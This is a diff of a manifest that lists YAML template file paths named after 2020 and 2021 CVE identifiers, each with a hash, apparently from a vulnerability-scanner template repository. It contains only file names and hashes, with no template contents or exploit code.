+http/cves/2020/CVE-2020-1943.yaml:c20358d71801bc3a89d487c347759d5a945f1a17 +http/cves/2020/CVE-2020-19515.yaml:dea60b2e1d1958a08f9da9899c2e41f68ecc7c62 +http/cves/2020/CVE-2020-1956.yaml:876397e0713edc0436cfa44c6ef37ddb2b1d6f32 +http/cves/2020/CVE-2020-19625.yaml:b01ff5065eec0c40dee441818ef56ae16887bdc8 +http/cves/2020/CVE-2020-20285.yaml:23835b1f973258430929ed5f7491fe0d4cf3d218 +http/cves/2020/CVE-2020-20300.yaml:8d78936d45236e8880bc2e3f8a04d9fcfae04ede +http/cves/2020/CVE-2020-2036.yaml:45bbde230ff7a88a5e99bc9511f5a16471cfc3e5 +http/cves/2020/CVE-2020-2096.yaml:b0da17ae9c726df95a435a3125de4afe781ac2cc +http/cves/2020/CVE-2020-20982.yaml:24b975863087a94907bd7bcd895ed232ad82efa4 +http/cves/2020/CVE-2020-20988.yaml:41d6cda2809766df44d2d7ea5cd23f0ce54f7423 +http/cves/2020/CVE-2020-21012.yaml:f3234a48fbf8f2cfbb391bfc4dfb581cd981141a +http/cves/2020/CVE-2020-2103.yaml:60a069bdfd15c79fbbce5b00aaa45ff0caac6a02 +http/cves/2020/CVE-2020-21224.yaml:5f1867126dcdce697cf526567afb21a1ccd91dea +http/cves/2020/CVE-2020-2140.yaml:6234c088e4139b6646ad2c76d7ee11b1fb7f3a17 +http/cves/2020/CVE-2020-22208.yaml:95ed3fa603bf00adfb1d532605a4e1c8d607f0a9 +http/cves/2020/CVE-2020-22209.yaml:aa84dd484c679e286d05299f900d12c83ca2c525 +http/cves/2020/CVE-2020-22210.yaml:873696aee71dd809a97549d1549271dcb1fbccda +http/cves/2020/CVE-2020-22211.yaml:ef9ea3d3ae6cdf880fd0246662cd8eec8204e843 +http/cves/2020/CVE-2020-22840.yaml:c2797444cc7956852c5c815083510aca608ef2c0 +http/cves/2020/CVE-2020-23015.yaml:98de36feaa40f10fe37da128f7fc6ff4ff56b0c1 +http/cves/2020/CVE-2020-23517.yaml:67ebc5a283e68d1f2b868ddd5a2bd95df92a66df +http/cves/2020/CVE-2020-23575.yaml:459d112f1a188999ff313d8f3ece8841b146d8e9 +http/cves/2020/CVE-2020-23697.yaml:3abd2609341688781c6cdef382d576216a7117e8 +http/cves/2020/CVE-2020-23972.yaml:dbfd3f118635dd8a414d4d875bb2a30c6c4c0e6f +http/cves/2020/CVE-2020-24148.yaml:6f19fe76347b82fd0953ff281fcb006455adf85f +http/cves/2020/CVE-2020-24186.yaml:ce14b6fa4a4e1c4af18693fa6b078ff0e9e68dc9 +http/cves/2020/CVE-2020-24223.yaml:d4701f222fa7fc0be524628bd11e2d464c92460b +http/cves/2020/CVE-2020-24312.yaml:56babf3597fa02515ec88ad13869d56ee045cc3d +http/cves/2020/CVE-2020-24391.yaml:b872a0a820887cde9a5d936809eca71f9bad1bf4 +http/cves/2020/CVE-2020-24550.yaml:6638ff4d111970538b40920ce571ceb8ef7806b5 +http/cves/2020/CVE-2020-24571.yaml:29f73eb7d18a6c35b7ef27dfb14e4251bdbf1ae6 +http/cves/2020/CVE-2020-24579.yaml:60a974034949d24a7cd4252b11e0b61388d86422 +http/cves/2020/CVE-2020-24589.yaml:5e2093a502196ee95a6055b27fed65deda3aed7a +http/cves/2020/CVE-2020-24701.yaml:70545f976eff60a38bf0d89abd6e6a6fe3028078 +http/cves/2020/CVE-2020-24902.yaml:cf6849af435e5ff05104d7e8e6f89a26918deeb7 +http/cves/2020/CVE-2020-24903.yaml:1452ce40ca4ed786b09965ddfed95feb86334f2d +http/cves/2020/CVE-2020-24912.yaml:213c945898403aec8d9091f4c097652884d85b19 +http/cves/2020/CVE-2020-24949.yaml:e3318ebebd9c195d951103a048ab74513f5dca99 +http/cves/2020/CVE-2020-25078.yaml:19716d1db7fe3d21d17faccfd8234983f75642f9 +http/cves/2020/CVE-2020-25213.yaml:73dd30385b7415f9007f39d427c6d3ab5ba1c5b1 +http/cves/2020/CVE-2020-25223.yaml:f013c7532483082d614715c97042e22381ed70db +http/cves/2020/CVE-2020-25495.yaml:b365d3fe77f16b706fd13dbfc113d8012945c333 +http/cves/2020/CVE-2020-25506.yaml:8506b72629b3b43b77536389aac83a71a538b823 +http/cves/2020/CVE-2020-2551.yaml:5e71b938a7293dbc34bf95cc46789ff3a37009b5 +http/cves/2020/CVE-2020-25540.yaml:0536d8f96424c369d27e4b21d8a43eaf386ac06d +http/cves/2020/CVE-2020-25780.yaml:18def8b5e33d4f1716c304c0dc7813320fb484c4 +http/cves/2020/CVE-2020-25864.yaml:25e713f32adda751a0845406e2ffc437f4badd70 http/cves/2020/CVE-2020-26073.yaml:793eb5c47388abfea3111d98fc083ef549f2f51f -http/cves/2020/CVE-2020-26153.yaml:1a20e2dd7fadc2d1738269e50f5c07f96b060b6c -http/cves/2020/CVE-2020-26214.yaml:87d7caa48e7bfd0fbee42ed497f0b58ee121a203 -http/cves/2020/CVE-2020-26217.yaml:cdbbb2fa2d9c90b1e6123c4ac6b82761c40641e3 -http/cves/2020/CVE-2020-26248.yaml:ae918a8975d55fc5d4f7fac85014971d734b1f51 -http/cves/2020/CVE-2020-26258.yaml:59e707d720d01a86f03013fea74e4363a4ab8026 -http/cves/2020/CVE-2020-26413.yaml:8f1a8b8dacd2eb8c42d35b6d4780ad1a55b9e16c -http/cves/2020/CVE-2020-26876.yaml:4986efaaf7fd98ddc499bded2f42afd942828696 -http/cves/2020/CVE-2020-26919.yaml:b2b41f27970c494f0d3fd27dcbeef26ef37472be -http/cves/2020/CVE-2020-26948.yaml:853254159debc9eaa2d0fa4e89de16fec4f4ea73 -http/cves/2020/CVE-2020-27191.yaml:84ecbf468b2193fdc0e9c23ff9a933e7e71df4d0 -http/cves/2020/CVE-2020-2733.yaml:764e634cc66b30e30c49b8673923419355f2f15b -http/cves/2020/CVE-2020-27361.yaml:62e15d8e22702d4c7067ddb9eefd5731f9eff3e2 -http/cves/2020/CVE-2020-27467.yaml:ecc8c611a64a5518cd98675b2bf6f9b367b99466 -http/cves/2020/CVE-2020-27481.yaml:9209c6f13f38a8bee97f6e11de0e2a4a6563b249 -http/cves/2020/CVE-2020-27735.yaml:02b55dffc439c23f319b2079e403dc3b40116ddc -http/cves/2020/CVE-2020-27866.yaml:80cc6098750162e069b7df1165f850be45b0084a -http/cves/2020/CVE-2020-27982.yaml:681565abcb54deeeb03c9ed7925241a8326441f1 -http/cves/2020/CVE-2020-27986.yaml:b96aee8397bdcc4e42a2c081d3c010f04a897799 -http/cves/2020/CVE-2020-28185.yaml:777dad1afc173e3e46c77bc95a0f5a0fc25ec3ef -http/cves/2020/CVE-2020-28188.yaml:7610315cc83fe183a84755f31588d670ee02b4d7 -http/cves/2020/CVE-2020-28208.yaml:8433350daeec94f9ba7d8390844b968b619e1ea4 -http/cves/2020/CVE-2020-28351.yaml:fd293babf3398904fb6f5abd341f4a080645906b -http/cves/2020/CVE-2020-28871.yaml:4c448eda771743ef6b72d3cd6d251b5b37c2a402 -http/cves/2020/CVE-2020-28976.yaml:c9ff25ed08ff566680eaf87669a0ade1f4c70f3f -http/cves/2020/CVE-2020-29164.yaml:76bfdf186bdd649c16fc74026101e39bd8346ced -http/cves/2020/CVE-2020-29227.yaml:220d89379fdac4406b3ea00c90b71aa1632a77f9 -http/cves/2020/CVE-2020-29284.yaml:438af2723b9d4355e2e755af7fecfe11460bd16e -http/cves/2020/CVE-2020-29395.yaml:f051cc7d177b2907541c5dd1cd021f41cffd6cdd -http/cves/2020/CVE-2020-29453.yaml:ede2bf153434a346f8c2ea4379c7681b6f268bb1 -http/cves/2020/CVE-2020-29583.yaml:07f9eb905ce1b384dab3ac69c8aa8daa9fc90e0c -http/cves/2020/CVE-2020-29597.yaml:37ed49d8f0cab75a02d133ecdcf387619b5e3be9 -http/cves/2020/CVE-2020-3187.yaml:0404a90a80fcda6d340c4c4991e9262bd6c00851 -http/cves/2020/CVE-2020-3452.yaml:87bb1d58277a3308e98fb749fa585cbdfe30908f -http/cves/2020/CVE-2020-35234.yaml:47242511d64cda582e22411d3fe077206e7a45ca -http/cves/2020/CVE-2020-35338.yaml:a900d8e737e7a24f3ece30cf0a9c831f069151ee -http/cves/2020/CVE-2020-35476.yaml:e6e6f21536bdd6842e69527ccd7344d509ea5602 -http/cves/2020/CVE-2020-35489.yaml:97b9c92f752e88d6555f2c3a154f85b1596a5a90 -http/cves/2020/CVE-2020-35580.yaml:c3d97357a2a71ef537434353c48f93a7194356da -http/cves/2020/CVE-2020-35598.yaml:b4ae685b931d356a7c3540f99b8e98024f5939db -http/cves/2020/CVE-2020-35713.yaml:775cea4cdc6358157608cf2214bec0b9aa9adfc7 -http/cves/2020/CVE-2020-35729.yaml:57884cb2c2a3176ac482c873a92aecca77dbbaf9 -http/cves/2020/CVE-2020-35736.yaml:815c1ca4c2a3261233dd2606346f819860941679 -http/cves/2020/CVE-2020-35749.yaml:9e8400f2306259191a3db6a044f98d943f78ecc4 -http/cves/2020/CVE-2020-35774.yaml:96d9409ebe45b1e0ade8a7a6c7226ea9b92691dc -http/cves/2020/CVE-2020-3580.yaml:9bacaf5861ab14282d2167c48e72092e23ea6b89 -http/cves/2020/CVE-2020-35846.yaml:d4a7eb1aff6aac99b6631c1f06c5b9c05e78e3d5 -http/cves/2020/CVE-2020-35847.yaml:0c5c7cc7cfb0a336f170e84c53f05d16b40ac1dd -http/cves/2020/CVE-2020-35848.yaml:f851a435886bd723eb46ab8cc7baad5dc246d40f -http/cves/2020/CVE-2020-35951.yaml:f4a626f26cfa8817ad97fc7dd1087a730c4aedc8 -http/cves/2020/CVE-2020-35984.yaml:cb7d115135f66cac0d1bfb5d982b1a2ced2606ad -http/cves/2020/CVE-2020-35985.yaml:dea264682b95078f42fc588c3d250a02a43b4e26 -http/cves/2020/CVE-2020-35986.yaml:71aa8deb0485048ee3ea97285e72a26040486cc5 -http/cves/2020/CVE-2020-35987.yaml:9041e09fc5f8d0ff6a8c933d043e3c39c74bbdcc -http/cves/2020/CVE-2020-36112.yaml:bfb714794579e8941b014f9250bdecf9fa83d7fc -http/cves/2020/CVE-2020-36289.yaml:e55305b762b0b2df49e5f8b6bec40df59152a277 -http/cves/2020/CVE-2020-36365.yaml:b091623045555f6ceed542e3c9a696a7300a33ef -http/cves/2020/CVE-2020-36510.yaml:258644b93509168b2a9ea403dcbf89e6d5697b02 -http/cves/2020/CVE-2020-4463.yaml:70aebfb16b188166e46f06b5c44856a2503e5dbd -http/cves/2020/CVE-2020-5191.yaml:86e907b71d0d9dc5487ec3e595acdfc15dcacdb3 -http/cves/2020/CVE-2020-5192.yaml:deb0f56875e248f8621c131b474787c736a6d9e6 -http/cves/2020/CVE-2020-5284.yaml:36f89425d662bc99d40c9c52451ec7ebd48073ba -http/cves/2020/CVE-2020-5307.yaml:53573c021a290aeb94676454908220cb1385923e -http/cves/2020/CVE-2020-5405.yaml:3babb9fba7f757e73eab63a71856a3349a271938 -http/cves/2020/CVE-2020-5410.yaml:5510422bfc566ce1b62c77dc0acc7f53d78a8c48 -http/cves/2020/CVE-2020-5412.yaml:a984a878e28a4a917e71d49464ee1135d7d74ee8 -http/cves/2020/CVE-2020-5775.yaml:d93840f09c699523c4fc8a1d6713348424dd1021 -http/cves/2020/CVE-2020-5776.yaml:0db504c2185bbaacd4867d4c9c26820592d9e076 -http/cves/2020/CVE-2020-5777.yaml:711dc669c5db72477d3b57c78ca941fc63759d51 -http/cves/2020/CVE-2020-5847.yaml:df460519b79bfbf1d3d68f2baa3b0690de5d3f29 -http/cves/2020/CVE-2020-5902.yaml:d7ce022c3c7599ce8fde5e5eea8beebbdbc80996 -http/cves/2020/CVE-2020-6171.yaml:a9b364e1672f07b6196734e2daeade56a900fcbc -http/cves/2020/CVE-2020-6207.yaml:755a42a91ad0df0c5664d998ca7984e4a19fe981 -http/cves/2020/CVE-2020-6287.yaml:3244ea9e31e91a3ac83c9ef188f72d2e4907a735 -http/cves/2020/CVE-2020-6308.yaml:c7447145be7462ce81b38d0720c758d0c4d5fd74 -http/cves/2020/CVE-2020-6637.yaml:29b6614c20481eee5702b5beb8a10db49ae52d6d -http/cves/2020/CVE-2020-6950.yaml:63785d8833670bf1d3670e7978bcecf19625fad0 -http/cves/2020/CVE-2020-7107.yaml:96d9406deee4c3efc2b81ef286082ceceed91e93 -http/cves/2020/CVE-2020-7136.yaml:6300dd4522fa0ff952f2486f106edda25f1d678f -http/cves/2020/CVE-2020-7209.yaml:de5b20d5def80ee4ff0496e74a78055034cb42e7 -http/cves/2020/CVE-2020-7318.yaml:4a430fbccdfb720713f7f169eb99336fd7bec17c -http/cves/2020/CVE-2020-7796.yaml:8b9f90c70751fbe8847b10771f1cdcb9c03ab69b -http/cves/2020/CVE-2020-7943.yaml:d675e1c0c9bdd71ce3756212c1b3bc688a73917c -http/cves/2020/CVE-2020-7961.yaml:e72d2f6dea7fae33a8509824ca1e12e675ab2b67 -http/cves/2020/CVE-2020-7980.yaml:90bf5a798c9f0e40646e2ed9e97a91421e97a613 -http/cves/2020/CVE-2020-8115.yaml:3a49952a84a608e74856f9554c5b506cc5a28dc2 -http/cves/2020/CVE-2020-8163.yaml:17137924d633e2027bad96a803e2258b9375f4f1 -http/cves/2020/CVE-2020-8191.yaml:59177f5d1c30aab00e70faf0a7d5bc158433161d -http/cves/2020/CVE-2020-8193.yaml:acf983c3664304c194d1bb3b6291e41261d7f2f6 -http/cves/2020/CVE-2020-8194.yaml:7536239e7e6ed350b5b208094d4fd4edb7554507 -http/cves/2020/CVE-2020-8209.yaml:924e8f65d768fa8b3603b51f838be7d1b7574b6b -http/cves/2020/CVE-2020-8497.yaml:58901b68db57c4e9d023bf8e63b3dd8129b0ac3c -http/cves/2020/CVE-2020-8512.yaml:1dcfe9c5817e60ce8b1c3e5141a23ffebce286ca -http/cves/2020/CVE-2020-8515.yaml:634853a56cbd175158a1c389ed219116c6e6b8d0 -http/cves/2020/CVE-2020-8615.yaml:dd209446e89204d0a404ca5a6538a9ce0f7be4f8 -http/cves/2020/CVE-2020-8641.yaml:9d745c9589fff85d4a67af07c84e283a8a946176 -http/cves/2020/CVE-2020-8644.yaml:b6259bc0a07397eaa2b993edae8d43fbbb5393b4 -http/cves/2020/CVE-2020-8654.yaml:57942f2599bcebea42167c1dad370be84bdb9e24 -http/cves/2020/CVE-2020-8771.yaml:b7f855bf2df83d915f16f8db7455a31806fe199e -http/cves/2020/CVE-2020-8772.yaml:5221564d1e9d582aeafb8ad86d92e5663bb6dbdd -http/cves/2020/CVE-2020-8813.yaml:7c2cd8f7360a0d50588011e6d1c0b6937936183e -http/cves/2020/CVE-2020-8982.yaml:746d71d9f8b5a69313252d9d1a3a084ce80b79ac -http/cves/2020/CVE-2020-9036.yaml:17a33a8de0c6d71a045cdca8b03ca8f9a1158db1 -http/cves/2020/CVE-2020-9043.yaml:b81a3223f35799bae55d1b42d50dab012d3ae78e -http/cves/2020/CVE-2020-9047.yaml:a5dc6e25b04d2224d0228a28ab9692c11aa8012c -http/cves/2020/CVE-2020-9054.yaml:bdc47ca8ddb23873f89952fbaa6b8a77c623ae69 -http/cves/2020/CVE-2020-9315.yaml:36cc07e37fdf09b665c80185118fd5c62d1ec8be -http/cves/2020/CVE-2020-9344.yaml:a7c15e6139e04b772c2e6296366455c83d917bd2 -http/cves/2020/CVE-2020-9376.yaml:80495eff882e917e206f0b5ea1897a6e62a3c298 -http/cves/2020/CVE-2020-9402.yaml:92da9f1a583c38fb07992e160e2a622e7270b0be -http/cves/2020/CVE-2020-9425.yaml:151380fef33f25c0f38877d956f7afbcb3b22ed4 -http/cves/2020/CVE-2020-9483.yaml:6ba6ec4e2de9c7ce4d3533ee8343cd0898ea559c -http/cves/2020/CVE-2020-9484.yaml:0e9d4e387639a7fbcb75a991e03eb0b6967a4786 -http/cves/2020/CVE-2020-9496.yaml:8c017493807e9b9fe95e2ae588a2b2cf672a6980 -http/cves/2020/CVE-2020-9757.yaml:2bfc7969b43143700213c96f1fec5a5182c55486 -http/cves/2021/CVE-2021-1472.yaml:85e42626b151110b0c9ceca7448387812a132aad -http/cves/2021/CVE-2021-1497.yaml:df17d4c795a8480d43c41a4531fa7a5fbf8ef751 -http/cves/2021/CVE-2021-1498.yaml:ad28479f1c22f654c7c79322bcbdbe5f7760a086 -http/cves/2021/CVE-2021-1499.yaml:976890a376e22955a7a374fa1440a8c984250bc1 -http/cves/2021/CVE-2021-20031.yaml:658fe9212845679257a441af2d041148cd6a4c42 -http/cves/2021/CVE-2021-20038.yaml:7f717d9dd014c11586cc5c1f57a9a97d1d297dd3 -http/cves/2021/CVE-2021-20090.yaml:f59add4a116d7dc0acf5876597a1ff71b9e946b4 -http/cves/2021/CVE-2021-20091.yaml:f746a228e338e6845c705b53e572e324f10fddb7 -http/cves/2021/CVE-2021-20092.yaml:5b75e80802e5da52f5a8108917afa9f5e68851b6 -http/cves/2021/CVE-2021-20114.yaml:95a7b948b75d34df0b1b3054682f59754895e7ce -http/cves/2021/CVE-2021-20123.yaml:bf633d995d6f281576f7164314f65eb0634095cc -http/cves/2021/CVE-2021-20124.yaml:f13ed432a0d4a742dcfd133bdba2c7b771eff0b5 -http/cves/2021/CVE-2021-20137.yaml:bb393be165c2992e5393611d4b54d678ba1daf68 -http/cves/2021/CVE-2021-20150.yaml:5fab7ec610aab03c856525e0866b0b400c788e40 -http/cves/2021/CVE-2021-20158.yaml:085dd4e5df5f025de7f429562db38fa2dd15faa9 -http/cves/2021/CVE-2021-20167.yaml:7b448aaa0c1e2b16b73ee4d19b6b4a3b5502ddde -http/cves/2021/CVE-2021-20323.yaml:48c1374c356d842a8705bf77ddebad591e53720b -http/cves/2021/CVE-2021-20792.yaml:b755bd3138e5e43d2a4d8e02e5d952896bc67d3d -http/cves/2021/CVE-2021-20837.yaml:2e547cefe7424840e41a3e5ea5a74bffce75216e -http/cves/2021/CVE-2021-21087.yaml:3b3edaed245e7f503a9d38e7c08b2f97c264b8ce -http/cves/2021/CVE-2021-21234.yaml:c1899888ad89a95b62819c91a03434793dc613d4 -http/cves/2021/CVE-2021-21287.yaml:9b449bf6bec9104535b4c108c8f54ea7a9cd2551 -http/cves/2021/CVE-2021-21307.yaml:4afef661aab4a59003752a228105254e0e9f6f8c -http/cves/2021/CVE-2021-21311.yaml:54c1075e6d29b767dac52d1450dd6080dd37e905 -http/cves/2021/CVE-2021-21315.yaml:0fbdfac886ea0d3fedb140ad626dd1e70f92395f -http/cves/2021/CVE-2021-21345.yaml:f8833f19382f128a78f1365a2eb17d0004ff0c8f -http/cves/2021/CVE-2021-21351.yaml:67929bdcd3f93a1636228bf85776f37950775c38 -http/cves/2021/CVE-2021-21389.yaml:5b569e0fbfdba771a55853bb10ac090efc24fa79 -http/cves/2021/CVE-2021-21402.yaml:c06eaac1a23a94d1c88b31073a126ba1f2ea2ccb -http/cves/2021/CVE-2021-21479.yaml:af8f9e93dc3497e0a8d2eac3d72e39d2c0ec121b -http/cves/2021/CVE-2021-21745.yaml:54208dde20d502425db8911d1f9013784f4d41d6 -http/cves/2021/CVE-2021-21799.yaml:9f879454e1df82701ebd282fc68350314b8639b2 -http/cves/2021/CVE-2021-21800.yaml:f662ae289d13c01e64e1880a63ca204bf7eb8952 -http/cves/2021/CVE-2021-21801.yaml:ae01263c336677b33c86bece084d59ae7b56abb5 -http/cves/2021/CVE-2021-21802.yaml:be75cb2cf376be957291314f83a4d7a00dcca843 -http/cves/2021/CVE-2021-21803.yaml:436e62e8fd6b634df0eb83666cdf32f570a6a905 -http/cves/2021/CVE-2021-21805.yaml:1e0d13510107415d2572d518eac5a2a8fb6272d4 -http/cves/2021/CVE-2021-21816.yaml:9e88e235e5bc9ce13198be27fbcc9fa519386cda -http/cves/2021/CVE-2021-21881.yaml:a132dd40aab1459cd0cfd49904d21bb62a3113c8 -http/cves/2021/CVE-2021-21972.yaml:4abee84a0d165186ada946d302967dfb02291c2e -http/cves/2021/CVE-2021-21973.yaml:3eb80e090bc38d58e07b773d6b1082e17d2af761 -http/cves/2021/CVE-2021-21975.yaml:58f23abf3a5dc27c734834e339f7f4a521d83ecd -http/cves/2021/CVE-2021-21978.yaml:bd1efa0c8291dffe302aa4f9cfdf92becf6d8009 -http/cves/2021/CVE-2021-21985.yaml:45fb3ffe4773b17f5ec01a0822943e0b16e6fe82 -http/cves/2021/CVE-2021-22005.yaml:ad8a3a1bb08da710f4b84069736d8efc7dc3f6cc -http/cves/2021/CVE-2021-22053.yaml:4d84f15299cab162dc81e8101cf3fc2cb8549ac4 -http/cves/2021/CVE-2021-22054.yaml:aff1d3ad8405c88a0f0acdc6b829bedef53ac39c -http/cves/2021/CVE-2021-22122.yaml:3fd42c4975177651ac448e8aa5c8ea4f3f6516db -http/cves/2021/CVE-2021-22145.yaml:57bbe3bf8cec257bb8cabc6cdbb89b2723d92827 -http/cves/2021/CVE-2021-22205.yaml:5e76796e761a3d4fea2790d62d057808a221be2b -http/cves/2021/CVE-2021-22214.yaml:1facb007ed7bfdbacfe708771069ce5ab0fb5c76 -http/cves/2021/CVE-2021-22502.yaml:55f1f8d0f63eacf0fc110b748b2d99abafdb9904 -http/cves/2021/CVE-2021-22707.yaml:e7624f5fa3b86acead6d0ca47187f95692e372b0 -http/cves/2021/CVE-2021-22873.yaml:2e48519bc8911d358b3837c17962eb7183019865 -http/cves/2021/CVE-2021-22911.yaml:6fc175ebb3bcee5645269adda223a9c4eec97f00 -http/cves/2021/CVE-2021-22986.yaml:8ce8cd03c98eb75b8fd9dbcb5addc54b98cbcf5c -http/cves/2021/CVE-2021-23241.yaml:35864fbf314e163f4ed4a4eda8024fc15e9020f6 -http/cves/2021/CVE-2021-24145.yaml:ed8bc7bebb8a0c595f8356af7b3c868024f896e0 -http/cves/2021/CVE-2021-24146.yaml:0a99d18eed1060e4bc60e0bd413015a523d15cd5 -http/cves/2021/CVE-2021-24150.yaml:167f0a9241436db7b9566079bce9f9cb1806d23d -http/cves/2021/CVE-2021-24155.yaml:d03f30389e8e5e078a4714c9f37f88cc2f0d85e9 -http/cves/2021/CVE-2021-24165.yaml:140763bfe26fcdc2b7f12b0c136f15c053d66e75 -http/cves/2021/CVE-2021-24169.yaml:42fbd355bb72b553c58a3f5f6885e0aaecd7607f -http/cves/2021/CVE-2021-24176.yaml:0b1e02a344c187736e248f46bea8111203dd3ef6 -http/cves/2021/CVE-2021-24210.yaml:5faabf9f28469d0a644adc7c6b967cb863e7c543 -http/cves/2021/CVE-2021-24214.yaml:9b6ccef02f5cdd45761491846b7260727b00417d -http/cves/2021/CVE-2021-24215.yaml:b16f19e3e61a14a6a724b2a5fd44b7add53f1353 -http/cves/2021/CVE-2021-24226.yaml:750685628c2fe02b8fee8af16db7ca09cf032397 -http/cves/2021/CVE-2021-24227.yaml:652f5254228f844969192e8b7ba0589c82595696 -http/cves/2021/CVE-2021-24235.yaml:704d3e3c798c0d4df35f36297d720c3612ff8cb8 -http/cves/2021/CVE-2021-24236.yaml:4cf82c36608444c86c44bedf3ed300605a29f0ab -http/cves/2021/CVE-2021-24237.yaml:b44600ac1dc396ebebfe1b718cd7336d693bbee4 -http/cves/2021/CVE-2021-24239.yaml:841b670bda70d69b8f3c2310350510e716d9e9cf -http/cves/2021/CVE-2021-24245.yaml:2e6476d5e5b5f37431e7b913a9a13dfd4175b85c -http/cves/2021/CVE-2021-24274.yaml:70f3fb89e29f7c689cf996ef9431fa7fe71326ae -http/cves/2021/CVE-2021-24275.yaml:5055eef104db9f2769eb0e95889c22ca5ae35a0e -http/cves/2021/CVE-2021-24276.yaml:6c2d268c19f96125a03e2396ccf0bfb6ce17fe5c -http/cves/2021/CVE-2021-24278.yaml:96bfb768e41f470c5ad6110755c4acac53b83def -http/cves/2021/CVE-2021-24284.yaml:2629f72a8833920bd0d4fbd80c35bb6f8e7239ae -http/cves/2021/CVE-2021-24285.yaml:3f26311da5894f458f8e0ea023cc695277c2d2cc -http/cves/2021/CVE-2021-24286.yaml:eb3b203819957abc16590aef9257d66d9e2f5b34 -http/cves/2021/CVE-2021-24287.yaml:eb3858bfcef5587fceaf42f0ecb7cba3a45506be -http/cves/2021/CVE-2021-24288.yaml:b51e4ecd3de5072cf17e78d3638982bc163d0588 -http/cves/2021/CVE-2021-24291.yaml:409376ec044947d4c7c601cfe19c485f26f02ddd -http/cves/2021/CVE-2021-24298.yaml:ca479c20fcbc83e185ecccc5266b9f34370fefdb -http/cves/2021/CVE-2021-24300.yaml:77a5d6449c485226f11878b85d45ac6b6d3afb56 -http/cves/2021/CVE-2021-24316.yaml:e85c53f821cb2db7847b07cf4e0ac1d8e03195e0 -http/cves/2021/CVE-2021-24320.yaml:a31452dba3a4943518f58aed3008c83dabcee749 -http/cves/2021/CVE-2021-24335.yaml:6feab42e81e3b5b04b7e030256243029d5f737ab -http/cves/2021/CVE-2021-24340.yaml:48b8a9615c1902e5d0e4cda7fe393036a2c2d597 -http/cves/2021/CVE-2021-24342.yaml:49a0d4ccb0269f95ff5f734461b1854e5f1147ac -http/cves/2021/CVE-2021-24347.yaml:1bdf6cc8e9ef0bc4ad70e6cbb303bef2e7d549a0 -http/cves/2021/CVE-2021-24351.yaml:d33a388b2c4634f4dc2c933f541a44eca79139e1 -http/cves/2021/CVE-2021-24358.yaml:066644c0558d9226ba09dead3370fe76f61f02ea -http/cves/2021/CVE-2021-24364.yaml:5db3ea35eaa11423163d4531bac5f90ba2ebc309 -http/cves/2021/CVE-2021-24370.yaml:38a717dc09231ac12bfea9e724f8bcbd604e319d -http/cves/2021/CVE-2021-24387.yaml:ef936c3b8f814a532e8c9f5c6633058d32e4b72b -http/cves/2021/CVE-2021-24389.yaml:f39eddc5dafd3a64bdba0547b0fc2ffe6c083448 -http/cves/2021/CVE-2021-24406.yaml:a5ab07f92c5c01989fe9eb0f795ddf5cbf1ae0a2 -http/cves/2021/CVE-2021-24407.yaml:4a4bc30d500ce5dc8945b9595400de0e62746d54 -http/cves/2021/CVE-2021-24409.yaml:1540b2410bfa92da8429456d789f467a7ccc20d2 -http/cves/2021/CVE-2021-24435.yaml:9320127de438995dba1ee1aade5a4a6b48135d1c -http/cves/2021/CVE-2021-24436.yaml:ddbb97701296408108d313319e7fedb67a3e63e7 -http/cves/2021/CVE-2021-24452.yaml:65aa301aa342d0c6dddf2fde16b1b1271a7a9b6d -http/cves/2021/CVE-2021-24472.yaml:386a57b759798b4bd0cf1cfcf5d2e7b0f393289c -http/cves/2021/CVE-2021-24488.yaml:91333f3213fa1a8bd5f3eed933fda8ac5ef7cb62 -http/cves/2021/CVE-2021-24495.yaml:1e5ddc210a50739da489fd193fb5ec0470a0d12a -http/cves/2021/CVE-2021-24498.yaml:609447e38395e9b6c36fb4829da9569587be6ff3 -http/cves/2021/CVE-2021-24499.yaml:f4379d50766fc7d2e2be192fb52838ea0a5b6870 -http/cves/2021/CVE-2021-24510.yaml:4bf127880e224d5ba3fc95bb8592c86576c1becb -http/cves/2021/CVE-2021-24554.yaml:2ddbf273207dab5592e6ce65d9aed5811594c323 -http/cves/2021/CVE-2021-24627.yaml:fd5828d8fb1df8bb6a327988a343e57803c57d2b -http/cves/2021/CVE-2021-24647.yaml:82e26c44fa39bc24962b7c8a9d90f5cd791e1467 -http/cves/2021/CVE-2021-24666.yaml:36ea091d6c932e5890542c43d9ef6169a3840ad4 -http/cves/2021/CVE-2021-24731.yaml:48cdd54e6b5a97fe2b25d63a56a1e1ef15365cda -http/cves/2021/CVE-2021-24746.yaml:d956e73b0c90ff0c1ed24abf5d75b5ed09cf5498 -http/cves/2021/CVE-2021-24750.yaml:18ad19d709f9d41a850823a7f958f5aac615de47 -http/cves/2021/CVE-2021-24762.yaml:d97486510a48bbc33c4bf5a6ccc8c8975f1efedb -http/cves/2021/CVE-2021-24791.yaml:83b91d2989934e5bba18757ee2b48c1d1ad1e993 -http/cves/2021/CVE-2021-24827.yaml:d897225c8005606499fc437d0d3c350e99fd3f9f -http/cves/2021/CVE-2021-24838.yaml:10d7e1643801897f5ec19074c399cfbf51d0e413 -http/cves/2021/CVE-2021-24862.yaml:370eb389e6881c06d3670e721cea5856ad2a1c17 -http/cves/2021/CVE-2021-24875.yaml:2b13ec2f602fbdef7e3d0fc3ccbcc7227d7caed1 -http/cves/2021/CVE-2021-24891.yaml:615b0bb681b8d8cdd818eabf54c57d416254eafd -http/cves/2021/CVE-2021-24910.yaml:9ba0615bfe5157028e7d0e7625847c47df9f561c -http/cves/2021/CVE-2021-24915.yaml:941c9d4b3b34ff4952e11e6bf50f1ad7b699b23a -http/cves/2021/CVE-2021-24917.yaml:deb88017be510aa60246f70ed42bf431c405aec1 -http/cves/2021/CVE-2021-24926.yaml:19aa90713385f969f1ee5a259227088496bfebd5 -http/cves/2021/CVE-2021-24931.yaml:d5e4264abd6dca7c235418a578f83a80ab486397 -http/cves/2021/CVE-2021-24940.yaml:8c9c634fbc3afeffeed4e2ec5d6dc27ab5d25a6f -http/cves/2021/CVE-2021-24946.yaml:5fc7e4307e2d259730b7cc4238c603491e1d5955 -http/cves/2021/CVE-2021-24947.yaml:9e7cdb5154a3ec3fe41d1ade9962635407b4e386 -http/cves/2021/CVE-2021-24956.yaml:a644aed9d84ac64d398e115e21de0ed4a17ae33a -http/cves/2021/CVE-2021-24970.yaml:fbb2f0fe0687079d69ae364f31246bf671b2e915 -http/cves/2021/CVE-2021-24979.yaml:f2c0bac66a3de4d034a886378f82c8a35776132d -http/cves/2021/CVE-2021-24987.yaml:57c089e37f85eda6982e995d62326e1f119f8776 -http/cves/2021/CVE-2021-24991.yaml:234a10241956d4c4f18beb6004b9ea962b06ed05 